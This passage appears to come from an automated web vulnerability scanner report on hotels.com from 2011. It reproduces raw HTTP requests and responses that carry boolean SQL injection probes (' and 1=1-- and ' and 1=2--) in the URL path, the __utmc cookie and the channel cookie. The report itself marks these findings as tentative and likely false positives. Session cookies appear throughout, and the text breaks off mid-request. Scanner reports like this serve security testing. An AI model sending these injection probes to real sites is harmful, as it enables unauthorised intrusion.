GET /hotel/details.html'%20and%201%3d1--%20?pa=1&pn=1&ps=1&tab=description&destinationId=1643195&hotelId=109368&arrivalDate=10-04-11&departureDate=10-07-11&rooms[0].numberOfAdults=2&roomno=1&validate=false&previousDateful=false&reviewOrder=date_newest_first HTTP/1.1
Host: www.hotels.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.hotels.com/search.do?searchParams.arrivalDate=10-04-11&pointName&searchParams.departureDate=10-07-11&lon=0.0&queryFormState=CLOSED&monthCheckOut=10&fromHotelDetails=false&destination=Boston%2C&showSimilarDestinations=true&fromLandmark=false&searchParams.rooms[0].numberOfAdults=2&asaReport&dayInMonthCheckIn=4&fromDisambiguation=false&destinationForLandmark&monthCheckIn=10&activeTab=DESTINATION&dayInMonthCheckOut=7&lat=0.0&rooms=1&ppc=1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SSID=BQBsXxscAAAAAAAp_YhOsO4QAin9iE4BAAAAAAAAAAAAKf2ITgCCAAABgwQAACn9iE4BAIcAAAG0BAAAKf2ITgEA; SSSC=3.G5659051284361178800.1|130.1155:135.1204; SESSID=44777099D2E37148A35E76005853DABC.hm21tc04; guid=e206d102-4853-4dd2-9d9b-23d14562d0f1; channel=DC; homepage_search_data="Qm9zdG9uLA..//10/04/11//10/07/11//2//MM/dd/yy//1643195"; s_cc=true; s_sv_sid=1011730152590; mvthistory=124.1.0.i1%3A97.73.1.i3%3A98.6.4%3A137.0.0.i2%3A145.0.0.i2%3A108.1.0.i2%3A152.0.0.i2%3A2.2.1%3A196.1.0%3A92.0.0.i1%3A132.2.0.i2%3A121.503.0.i7%3A138.1.0%3A195.0.0%3A104.0.1%7CHCOM_US; SSLB=1; user=QSplbl9VU3xIQ09NX1VTIUQqMTI0LjEuMC5pMSUzQTk3LjczLjEuaTMlM0E5OC42LjQlM0ExMzcuMC4wLmkyJTNBMTQ1LjAuMC5pMiUzQTEwOC4xLjAuaTIlM0ExNTIuMC4wLmkyJTNBMTk2LjEuMCUzQTkyLjAuMC5pMSUzQTEyMS41MDMuMC5pNyUzQTE5NS4wLjAlM0ExMDQuMC4xJTdDSENPTV9VUw..; s_vi=[CS]v1|27447E9805012D59-4000010860553A8B[CE]; __utma=58230453.1140823611.1317600611.1317600611.1317600611.1; __utmb=58230453.1.10.1317600611; __utmc=58230453; __utmz=58230453.1317600611.1.1.utmcsr=drf-global.com|utmccn=(referral)|utmcmd=referral|utmcct=/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/rf; s_sq=hotelsusprod%2Chotelsallprod%3D%2526pid%253Dsearch%252520result%252520with%252520dates%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fwww.hotels.com%25252Fhotel%25252Fdetails.html%25253Fpa%25253D1%252526pn%25253D1%252526ps%25253D1%252526tab%25253Ddescription%252526destinationId%25253D1643195%252526hotelI%2526ot%253DA; SSRT=oQGJTgA; SSPV=RcAAAAAAAAAAAAAAAAAAAAAAAAQAAAAAAAA

Response 1

HTTP/1.1 404 Not Found
Server: Apache
Expect:
Content-Type: text/html;charset=UTF-8
Cache-Control: private
RTSS: 1
Date: Mon, 03 Oct 2011 00:32:42 GMT
Content-Length: 43425
Connection: close
Vary: Accept-Encoding
Set-Cookie: user=QSplbl9VU3xIQ09NX1VT; Domain=.hotels.com; Expires=Tue, 02-Oct-2012 00:32:42 GMT; Path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" >
<head>

...[SNIP]...
<a id="sign_in_header_button" href="https://ssl.hotels.com/profile/signin.html?target=H4sIAAAAAAAAAGVPXVOCQBT9NdITK6CYL00jaA02hmDpSNM0K7vi2sLifgDx62OzHsyXO3fOufd89A9MYtpHWEJCBTjInN70HAsWqJt2b4Bs0-y2-5LjijAlplDivaJ3KQDtwoMr-8uJUwEMTeM65AhzzUUfGfJjbyVdlE1q2316Tmv3thJO2MRwnMYGwiXkUnGsBfXH0U2y4XETL9l4uD2RpXx8Xe8j0Ckzlos36x0UKt9hHu4nSFEp9A8LgoH30PiRuwWGhDuNWayRdKRmR-ZWrZuY62heDutO56dogPTNJ2s33izcOPkCGBWkBP2GuKhUQg3Nd2Zyii30goNzloJdwQgLSQooCSvOBoUahYliU7_qWMg56Uz-ivowW7USnkKYXRYtiyvhUvyHvgGcIw0SsAEAAA..&secure=false" rel="nofollow"
title="Sign in for faster booking and enhanced services"> Sign in</a>
<![endif]>
<!--[if IE]>
<a id="sign_in_header_button" href="https://ssl.hotels.com/profile/signin.html?target=H4sIAAAAAAAAAGVPXVOCQBT9NdITK6CYL00jaA02hmDpSNM0K7vi2sLifgDx62OzHsyXO3fOufd89A9MYtpHWEJCBTjInN70HAsWqJt2b4Bs0-y2-5LjijAlplDivaJ3KQDtwoMr-8uJUwEMTeM65AhzzUUfGfJjbyVdlE1q2316Tmv3thJO2MRwnMYGwiXkUnGsBfXH0U2y4XETL9l4uD2RpXx8Xe8j0Ckzlos36x0UKt9hHu4nSFEp9A8LgoH30PiRuwWGhDuNWayRdKRmR-ZWrZuY62heDutO56dogPTNJ2s33izcOPkCGBWkBP2GuKhUQg3Nd2Zyii30goNzloJdwQgLSQooCSvOBoUahYliU7_qWMg56Uz-ivowW7USnkKYXRYtiyvhUvyHvgGcIw0SsAEAAA..&secure=false" rel="nofollow"
title="Sign in for faster booking and enhanced services"> Sign in</a>
<![endif]-->
</span>
<span>&nbsp;/&nbsp;</span>
<a id="sign_up_header_button" href="https://ssl.hotels.com/profile/signup.html" rel="nofollow"
title="For faster bookings and enhanced services">Create Account</a>
</div>
<ul>
<li>
<a href="https://ssl.hotels.com/profile/summary.html" rel="nofollow"
title="View or edit your account details">
Account</a>
</li>
<li>
<a href="https://ssl.hotels.com/customer_care/bookings.html" rel="nofollow"
title="View or cancel a booking you've already made">
Reservations</a>
</li>
<li>
<a href="/hotel/saved_hotels.html" rel="nofollow"
title="View hotels you've saved">

...[SNIP]...

Request 2

GET /hotel/details.html'%20and%201%3d2--%20?pa=1&pn=1&ps=1&tab=description&destinationId=1643195&hotelId=109368&arrivalDate=10-04-11&departureDate=10-07-11&rooms[0].numberOfAdults=2&roomno=1&validate=false&previousDateful=false&reviewOrder=date_newest_first HTTP/1.1
Host: www.hotels.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.hotels.com/search.do?searchParams.arrivalDate=10-04-11&pointName&searchParams.departureDate=10-07-11&lon=0.0&queryFormState=CLOSED&monthCheckOut=10&fromHotelDetails=false&destination=Boston%2C&showSimilarDestinations=true&fromLandmark=false&searchParams.rooms[0].numberOfAdults=2&asaReport&dayInMonthCheckIn=4&fromDisambiguation=false&destinationForLandmark&monthCheckIn=10&activeTab=DESTINATION&dayInMonthCheckOut=7&lat=0.0&rooms=1&ppc=1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SSID=BQBsXxscAAAAAAAp_YhOsO4QAin9iE4BAAAAAAAAAAAAKf2ITgCCAAABgwQAACn9iE4BAIcAAAG0BAAAKf2ITgEA; SSSC=3.G5659051284361178800.1|130.1155:135.1204; SESSID=44777099D2E37148A35E76005853DABC.hm21tc04; guid=e206d102-4853-4dd2-9d9b-23d14562d0f1; channel=DC; homepage_search_data="Qm9zdG9uLA..//10/04/11//10/07/11//2//MM/dd/yy//1643195"; s_cc=true; s_sv_sid=1011730152590; mvthistory=124.1.0.i1%3A97.73.1.i3%3A98.6.4%3A137.0.0.i2%3A145.0.0.i2%3A108.1.0.i2%3A152.0.0.i2%3A2.2.1%3A196.1.0%3A92.0.0.i1%3A132.2.0.i2%3A121.503.0.i7%3A138.1.0%3A195.0.0%3A104.0.1%7CHCOM_US; SSLB=1; user=QSplbl9VU3xIQ09NX1VTIUQqMTI0LjEuMC5pMSUzQTk3LjczLjEuaTMlM0E5OC42LjQlM0ExMzcuMC4wLmkyJTNBMTQ1LjAuMC5pMiUzQTEwOC4xLjAuaTIlM0ExNTIuMC4wLmkyJTNBMTk2LjEuMCUzQTkyLjAuMC5pMSUzQTEyMS41MDMuMC5pNyUzQTE5NS4wLjAlM0ExMDQuMC4xJTdDSENPTV9VUw..; s_vi=[CS]v1|27447E9805012D59-4000010860553A8B[CE]; __utma=58230453.1140823611.1317600611.1317600611.1317600611.1; __utmb=58230453.1.10.1317600611; __utmc=58230453; __utmz=58230453.1317600611.1.1.utmcsr=drf-global.com|utmccn=(referral)|utmcmd=referral|utmcct=/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/rf; s_sq=hotelsusprod%2Chotelsallprod%3D%2526pid%253Dsearch%252520result%252520with%252520dates%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fwww.hotels.com%25252Fhotel%25252Fdetails.html%25253Fpa%25253D1%252526pn%25253D1%252526ps%25253D1%252526tab%25253Ddescription%252526destinationId%25253D1643195%252526hotelI%2526ot%253DA; SSRT=oQGJTgA; SSPV=RcAAAAAAAAAAAAAAAAAAAAAAAAQAAAAAAAA

Response 2

HTTP/1.1 404 Not Found
Server: Apache
Expect:
Content-Type: text/html;charset=UTF-8
Cache-Control: private
RTSS: 1
Date: Mon, 03 Oct 2011 00:32:42 GMT
Content-Length: 43617
Connection: close
Vary: Accept-Encoding
Set-Cookie: user=QSplbl9VU3xIQ09NX1VT; Domain=.hotels.com; Expires=Tue, 02-Oct-2012 00:32:42 GMT; Path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" >
<head>

...[SNIP]...
<a id="sign_in_header_button" href="https://ssl.hotels.com/profile/signin.html?target=H4sIAAAAAAAAAGVPXU_CMBT9NcynlTEo8mIMG2iGwbGhEGaMKWsZxa0d_dhwv95V9AF5ubk5597z0d1zRfIuJgrRXIK9KvKbjusghtvZ6_Sxa9vtdl8KUlGu5QQpstP5XQpAM_fQsvflxqkElqFJHQpMhOGijwz7sbdUEGfjugefntMa3lbSDU8xGqWxhUmJhNKCGEHzcYBJNjis4wUfDTZHulCPr6tdBFplzgv55rwDpostEeFujHWupPnhQdD3Hk5-BDfAUmhrMIefVD7U0wOHVQMTexXNykHd6vwUDbC5-eTN2puGa7eYA6tCOcW_IS4qlchAs62dHGMHv5DgnIXxKxgTqShDinJ2NmB6GCaaT_yqZZEQtDX5K-qjbNkodAxRdlm0ZFfCpfwPfQNy0k5HsAEAAA..&secure=false" rel="nofollow"
title="Sign in for faster booking and enhanced services"> Sign in</a>
<![endif]>
<!--[if IE]>
<a id="sign_in_header_button" href="https://ssl.hotels.com/profile/signin.html?target=H4sIAAAAAAAAAGVPXU_CMBT9NcynlTEo8mIMG2iGwbGhEGaMKWsZxa0d_dhwv95V9AF5ubk5597z0d1zRfIuJgrRXIK9KvKbjusghtvZ6_Sxa9vtdl8KUlGu5QQpstP5XQpAM_fQsvflxqkElqFJHQpMhOGijwz7sbdUEGfjugefntMa3lbSDU8xGqWxhUmJhNKCGEHzcYBJNjis4wUfDTZHulCPr6tdBFplzgv55rwDpostEeFujHWupPnhQdD3Hk5-BDfAUmhrMIefVD7U0wOHVQMTexXNykHd6vwUDbC5-eTN2puGa7eYA6tCOcW_IS4qlchAs62dHGMHv5DgnIXxKxgTqShDinJ2NmB6GCaaT_yqZZEQtDX5K-qjbNkodAxRdlm0ZFfCpfwPfQNy0k5HsAEAAA..&secure=false" rel="nofollow"
title="Sign in for faster booking and enhanced services"> Sign in</a>
<![endif]-->
</span>
<span>&nbsp;/&nbsp;</span>
<a id="sign_up_header_button" href="https://ssl.hotels.com/profile/signup.html" rel="nofollow"
title="For faster bookings and enhanced services">Create Account</a>
</div>
<ul>
<li>
<a href="https://ssl.hotels.com/profile/summary.html" rel="nofollow"
title="View or edit your account details">
Account</a>
</li>
<li>
<a href="https://ssl.hotels.com/customer_care/bookings.html" rel="nofollow"
title="View or cancel a booking you've already made">
Reservations</a>
</li>
<li>
<a href="/hotel/saved_hotels.html" rel="nofollow"
title="View hotels you've saved">

...[SNIP]...

1.17. http://www.hotels.com/hotel/details.html [__utmc cookie]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.hotels.com
Path:   /hotel/details.html

Issue detail

The __utmc cookie appears to be vulnerable to SQL injection. The payloads %20and%201%3d1--%20 and %20and%201%3d2--%20 (a numeric-context boolean pair, no closing quote) were each submitted in the __utmc cookie, and the two requests produced different responses, which the scanner takes as a sign that the input reaches a SQL query unsafely.

Automated difference-based tests for SQL injection are prone to false positives, so the reported requests and responses must be reviewed by hand before this is treated as a vulnerability. In the two traces below both responses are 200 OK with Content-Length: 270898, and the differences visible in the captured headers are confined to Date and to the Set-Cookie headers (mvthistory, user), which carry per-request session state; the body excerpts shown are identical. __utmc is also a Google Analytics session cookie that is normally consumed only by client-side script. Treat the finding as unconfirmed until the full response bodies have been diffed with the volatile headers stripped.

Request 1

GET /hotel/details.html?pa=1&pn=1&ps=1&tab=description&destinationId=1643195&hotelId=109368&arrivalDate=10-04-11&departureDate=10-07-11&rooms[0].numberOfAdults=2&roomno=1&validate=false&previousDateful=false&reviewOrder=date_newest_first HTTP/1.1
Host: www.hotels.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.hotels.com/search.do?searchParams.arrivalDate=10-04-11&pointName&searchParams.departureDate=10-07-11&lon=0.0&queryFormState=CLOSED&monthCheckOut=10&fromHotelDetails=false&destination=Boston%2C&showSimilarDestinations=true&fromLandmark=false&searchParams.rooms[0].numberOfAdults=2&asaReport&dayInMonthCheckIn=4&fromDisambiguation=false&destinationForLandmark&monthCheckIn=10&activeTab=DESTINATION&dayInMonthCheckOut=7&lat=0.0&rooms=1&ppc=1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SSID=BQBsXxscAAAAAAAp_YhOsO4QAin9iE4BAAAAAAAAAAAAKf2ITgCCAAABgwQAACn9iE4BAIcAAAG0BAAAKf2ITgEA; SSSC=3.G5659051284361178800.1|130.1155:135.1204; SESSID=44777099D2E37148A35E76005853DABC.hm21tc04; guid=e206d102-4853-4dd2-9d9b-23d14562d0f1; channel=DC; homepage_search_data="Qm9zdG9uLA..//10/04/11//10/07/11//2//MM/dd/yy//1643195"; s_cc=true; s_sv_sid=1011730152590; mvthistory=124.1.0.i1%3A97.73.1.i3%3A98.6.4%3A137.0.0.i2%3A145.0.0.i2%3A108.1.0.i2%3A152.0.0.i2%3A2.2.1%3A196.1.0%3A92.0.0.i1%3A132.2.0.i2%3A121.503.0.i7%3A138.1.0%3A195.0.0%3A104.0.1%7CHCOM_US; SSLB=1; user=QSplbl9VU3xIQ09NX1VTIUQqMTI0LjEuMC5pMSUzQTk3LjczLjEuaTMlM0E5OC42LjQlM0ExMzcuMC4wLmkyJTNBMTQ1LjAuMC5pMiUzQTEwOC4xLjAuaTIlM0ExNTIuMC4wLmkyJTNBMTk2LjEuMCUzQTkyLjAuMC5pMSUzQTEyMS41MDMuMC5pNyUzQTE5NS4wLjAlM0ExMDQuMC4xJTdDSENPTV9VUw..; s_vi=[CS]v1|27447E9805012D59-4000010860553A8B[CE]; __utma=58230453.1140823611.1317600611.1317600611.1317600611.1; __utmb=58230453.1.10.1317600611; __utmc=58230453%20and%201%3d1--%20; __utmz=58230453.1317600611.1.1.utmcsr=drf-global.com|utmccn=(referral)|utmcmd=referral|utmcct=/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/rf; s_sq=hotelsusprod%2Chotelsallprod%3D%2526pid%253Dsearch%252520result%252520with%252520dates%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fwww.hotels.com%25252Fhotel%25252Fdetails.html%25253Fpa%25253D1%252526pn%25253D1%252526ps%25253D1%252526tab%25253Ddescription%252526destinationId%25253D1643195%252526hotelI%2526ot%253DA; SSRT=oQGJTgA; SSPV=RcAAAAAAAAAAAAAAAAAAAAAAAAQAAAAAAAA

Response 1

HTTP/1.1 200 OK
Server: Apache
X-hcom-ctx: en_US|HCOM_US
Content-Language: en-US
Cache-Control: private, max-age=0, proxy-revalidate, no-store, no-cache, must-revalidate
Expires: Sat, 26 Mar 2011 15:35:18 GMT
Expect:
Content-Type: text/html;charset=UTF-8
Pragma: no-cache
RTSS: 1
Date: Mon, 03 Oct 2011 00:31:47 GMT
Connection: close
Vary: Accept-Encoding
Connection: Transfer-Encoding
Set-Cookie: mvthistory=185.0.0.i1%3A114.0.0%3A130.1.1.i2%3A103.4.1.i6%3A171.0.0%3A98.6.4%3A142.1.0.i4%3A200.1.0%3A198.0.0%3A190.0.0%3A134.0.1%3A2.2.1%3A209.0.1%3A147.0.1.i6%3A92.3.0.i1%3A132.0.0.i2%3A122.1.0.i3%3A149.0.0.i1%7CHCOM_US; Domain=.hotels.com; Expires=Tue, 02-Oct-2012 00:31:47 GMT; Path=/
Set-Cookie: homepage_search_data="Qm9zdG9uLCBNYXNzYWNodXNldHRzLCBVbml0ZWQgU3RhdGVz//10/04/11//10/07/11//2//MM/dd/yy//"; Version=1; Domain=.hotels.com; Max-Age=31536000; Expires=Tue, 02-Oct-2012 00:31:47 GMT; Path=/
Set-Cookie: user=RCoxODUuMC4wLmkxOjExNC4wLjA6MTMwLjEuMS5pMjoxMDMuNC4xLmk2OjE3MS4wLjA6OTguNi40OjE0Mi4xLjAuaTQ6MjAwLjEuMDoxOTguMC4wOjE5MC4wLjA6MTM0LjAuMToyLjIuMToyMDkuMC4xOjE0Ny4wLjEuaTY6OTIuMy4wLmkxOjEzMi4wLjAuaTI6MTIyLjEuMC5pMzoxNDkuMC4wLmkxfEhDT01fVVMhQSplbl9VU3xIQ09NX1VTIUUqMTA5MzY4fDA0LzEwLzIwMTF8MDcvMTAvMjAxMXwyIUYq; Domain=.hotels.com; Expires=Tue, 02-Oct-2012 00:31:47 GMT; Path=/
Content-Length: 270898

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://ogp.me/ns#" xmlns:fb="http://www.facebook.com/2008/fbml" xml:lang="en" lang="en" >
<head>
<meta http-equiv="X-UA-Compatible" content="IE=9; IE=8; IE=7" />
<title>Boston Omni Parker House Hotel - Hotels.com - Hotel rooms with reviews. Discounts and Deals on 85,000 hotels worldwide</title>
<link href="/bundles/hcom-common-H36.0.2-128976-HCOM_US-www_hotels_com-en_US.css" type="text/css" rel="stylesheet" media="screen,print" />
<!--[if lte IE 6]>
<link href="/bundles/hcom-common.ie6-H36.0.2-128976-HCOM_US-www_hotels_com-en_US.css" type="text/css" rel="stylesheet" media="screen" />

<![endif]--><!--[if IE 7]>
<link href="/bundles/hcom-common.ie7-H36.0.2-128976-HCOM_US-www_hotels_com-en_US.css" type="text/css" rel="stylesheet" media="screen" />

<![endif]--><!--[if IE 8]>
<link href="/bundles/hcom-common.ie8-H36.0.2-128976-HCOM_US-www_hotels_com-en_US.css" type="text
...[SNIP]...

Request 2

GET /hotel/details.html?pa=1&pn=1&ps=1&tab=description&destinationId=1643195&hotelId=109368&arrivalDate=10-04-11&departureDate=10-07-11&rooms[0].numberOfAdults=2&roomno=1&validate=false&previousDateful=false&reviewOrder=date_newest_first HTTP/1.1
Host: www.hotels.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.hotels.com/search.do?searchParams.arrivalDate=10-04-11&pointName&searchParams.departureDate=10-07-11&lon=0.0&queryFormState=CLOSED&monthCheckOut=10&fromHotelDetails=false&destination=Boston%2C&showSimilarDestinations=true&fromLandmark=false&searchParams.rooms[0].numberOfAdults=2&asaReport&dayInMonthCheckIn=4&fromDisambiguation=false&destinationForLandmark&monthCheckIn=10&activeTab=DESTINATION&dayInMonthCheckOut=7&lat=0.0&rooms=1&ppc=1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SSID=BQBsXxscAAAAAAAp_YhOsO4QAin9iE4BAAAAAAAAAAAAKf2ITgCCAAABgwQAACn9iE4BAIcAAAG0BAAAKf2ITgEA; SSSC=3.G5659051284361178800.1|130.1155:135.1204; SESSID=44777099D2E37148A35E76005853DABC.hm21tc04; guid=e206d102-4853-4dd2-9d9b-23d14562d0f1; channel=DC; homepage_search_data="Qm9zdG9uLA..//10/04/11//10/07/11//2//MM/dd/yy//1643195"; s_cc=true; s_sv_sid=1011730152590; mvthistory=124.1.0.i1%3A97.73.1.i3%3A98.6.4%3A137.0.0.i2%3A145.0.0.i2%3A108.1.0.i2%3A152.0.0.i2%3A2.2.1%3A196.1.0%3A92.0.0.i1%3A132.2.0.i2%3A121.503.0.i7%3A138.1.0%3A195.0.0%3A104.0.1%7CHCOM_US; SSLB=1; user=QSplbl9VU3xIQ09NX1VTIUQqMTI0LjEuMC5pMSUzQTk3LjczLjEuaTMlM0E5OC42LjQlM0ExMzcuMC4wLmkyJTNBMTQ1LjAuMC5pMiUzQTEwOC4xLjAuaTIlM0ExNTIuMC4wLmkyJTNBMTk2LjEuMCUzQTkyLjAuMC5pMSUzQTEyMS41MDMuMC5pNyUzQTE5NS4wLjAlM0ExMDQuMC4xJTdDSENPTV9VUw..; s_vi=[CS]v1|27447E9805012D59-4000010860553A8B[CE]; __utma=58230453.1140823611.1317600611.1317600611.1317600611.1; __utmb=58230453.1.10.1317600611; __utmc=58230453%20and%201%3d2--%20; __utmz=58230453.1317600611.1.1.utmcsr=drf-global.com|utmccn=(referral)|utmcmd=referral|utmcct=/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/rf; s_sq=hotelsusprod%2Chotelsallprod%3D%2526pid%253Dsearch%252520result%252520with%252520dates%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fwww.hotels.com%25252Fhotel%25252Fdetails.html%25253Fpa%25253D1%252526pn%25253D1%252526ps%25253D1%252526tab%25253Ddescription%252526destinationId%25253D1643195%252526hotelI%2526ot%253DA; SSRT=oQGJTgA; SSPV=RcAAAAAAAAAAAAAAAAAAAAAAAAQAAAAAAAA

Response 2

HTTP/1.1 200 OK
Server: Apache
X-hcom-ctx: en_US|HCOM_US
Content-Language: en-US
Cache-Control: private, max-age=0, proxy-revalidate, no-store, no-cache, must-revalidate
Expires: Sat, 26 Mar 2011 15:35:18 GMT
Expect:
Content-Type: text/html;charset=UTF-8
Pragma: no-cache
RTSS: 1
Date: Mon, 03 Oct 2011 00:31:48 GMT
Connection: close
Vary: Accept-Encoding
Connection: Transfer-Encoding
Set-Cookie: homepage_search_data="Qm9zdG9uLCBNYXNzYWNodXNldHRzLCBVbml0ZWQgU3RhdGVz//10/04/11//10/07/11//2//MM/dd/yy//"; Version=1; Domain=.hotels.com; Max-Age=31536000; Expires=Tue, 02-Oct-2012 00:31:48 GMT; Path=/
Set-Cookie: user=QSplbl9VU3xIQ09NX1VTIUUqMTA5MzY4fDA0LzEwLzIwMTF8MDcvMTAvMjAxMXwyIUYq; Domain=.hotels.com; Expires=Tue, 02-Oct-2012 00:31:48 GMT; Path=/
Content-Length: 270898

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://ogp.me/ns#" xmlns:fb="http://www.facebook.com/2008/fbml" xml:lang="en" lang="en" >
<head>
<meta http-equiv="X-UA-Compatible" content="IE=9; IE=8; IE=7" />
<title>Boston Omni Parker House Hotel - Hotels.com - Hotel rooms with reviews. Discounts and Deals on 85,000 hotels worldwide</title>
<link href="/bundles/hcom-common-H36.0.2-128976-HCOM_US-www_hotels_com-en_US.css" type="text/css" rel="stylesheet" media="screen,print" />
<!--[if lte IE 6]>
<link href="/bundles/hcom-common.ie6-H36.0.2-128976-HCOM_US-www_hotels_com-en_US.css" type="text/css" rel="stylesheet" media="screen" />

<![endif]--><!--[if IE 7]>
<link href="/bundles/hcom-common.ie7-H36.0.2-128976-HCOM_US-www_hotels_com-en_US.css" type="text/css" rel="stylesheet" media="screen" />

<![endif]--><!--[if IE 8]>
<link href="/bundles/hcom-common.ie8-H36.0.2-128976-HCOM_US-www_hotels_com-en_US.css" type="text/css" rel="stylesheet" media="screen" />

<![endif]--><link href="/bundles/hcom-hotel-details-rd-H36.0.2-128976-HCOM_US-www_hotels_com-en_US.css" type="text/css" rel="stylesheet" media="screen,print" />
<!--[if lte IE 6]>
<link href="/bundles/hcom-hotel-details.ie6-H36.0.2-128976-HCOM_US-www_hotels_com-en_US.css" type="text/css" rel="stylesheet" media="screen" />

<![endif]--><!--[if IE 7]>
<link href="/bundles/hcom-hotel-details.ie7-H36.0.2-128976-HCOM_US-www_hotels_com-en_US.css" type="text/css" rel="stylesheet" media="screen" />

...[SNIP]...

1.18. http://www.hotels.com/hotel/details.html [channel cookie]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.hotels.com
Path:   /hotel/details.html

Issue detail

The channel cookie appears to be vulnerable to SQL injection. The payloads '%20and%201%3d1--%20 and '%20and%201%3d2--%20 (a string-context boolean pair, leading single quote) were each submitted in the channel cookie, and the two requests produced different responses, which the scanner takes as a sign that the input reaches a SQL query unsafely.

Automated difference-based tests for SQL injection are prone to false positives, so the reported requests and responses must be reviewed by hand before this is treated as a vulnerability. Both responses below are 200 OK with Content-Length: 270898; the captured headers differ only in Date (00:30:46 vs 00:30:47) and in the Set-Cookie headers (mvthistory is set in Response 1 only, user has a different value), and the body excerpts shown are identical. Treat the finding as unconfirmed until the full response bodies have been diffed with those headers stripped.

Request 1

GET /hotel/details.html?pa=1&pn=1&ps=1&tab=description&destinationId=1643195&hotelId=109368&arrivalDate=10-04-11&departureDate=10-07-11&rooms[0].numberOfAdults=2&roomno=1&validate=false&previousDateful=false&reviewOrder=date_newest_first HTTP/1.1
Host: www.hotels.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.hotels.com/search.do?searchParams.arrivalDate=10-04-11&pointName&searchParams.departureDate=10-07-11&lon=0.0&queryFormState=CLOSED&monthCheckOut=10&fromHotelDetails=false&destination=Boston%2C&showSimilarDestinations=true&fromLandmark=false&searchParams.rooms[0].numberOfAdults=2&asaReport&dayInMonthCheckIn=4&fromDisambiguation=false&destinationForLandmark&monthCheckIn=10&activeTab=DESTINATION&dayInMonthCheckOut=7&lat=0.0&rooms=1&ppc=1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SSID=BQBsXxscAAAAAAAp_YhOsO4QAin9iE4BAAAAAAAAAAAAKf2ITgCCAAABgwQAACn9iE4BAIcAAAG0BAAAKf2ITgEA; SSSC=3.G5659051284361178800.1|130.1155:135.1204; SESSID=44777099D2E37148A35E76005853DABC.hm21tc04; guid=e206d102-4853-4dd2-9d9b-23d14562d0f1; channel=DC'%20and%201%3d1--%20; homepage_search_data="Qm9zdG9uLA..//10/04/11//10/07/11//2//MM/dd/yy//1643195"; s_cc=true; s_sv_sid=1011730152590; mvthistory=124.1.0.i1%3A97.73.1.i3%3A98.6.4%3A137.0.0.i2%3A145.0.0.i2%3A108.1.0.i2%3A152.0.0.i2%3A2.2.1%3A196.1.0%3A92.0.0.i1%3A132.2.0.i2%3A121.503.0.i7%3A138.1.0%3A195.0.0%3A104.0.1%7CHCOM_US; SSLB=1; user=QSplbl9VU3xIQ09NX1VTIUQqMTI0LjEuMC5pMSUzQTk3LjczLjEuaTMlM0E5OC42LjQlM0ExMzcuMC4wLmkyJTNBMTQ1LjAuMC5pMiUzQTEwOC4xLjAuaTIlM0ExNTIuMC4wLmkyJTNBMTk2LjEuMCUzQTkyLjAuMC5pMSUzQTEyMS41MDMuMC5pNyUzQTE5NS4wLjAlM0ExMDQuMC4xJTdDSENPTV9VUw..; s_vi=[CS]v1|27447E9805012D59-4000010860553A8B[CE]; __utma=58230453.1140823611.1317600611.1317600611.1317600611.1; __utmb=58230453.1.10.1317600611; __utmc=58230453; 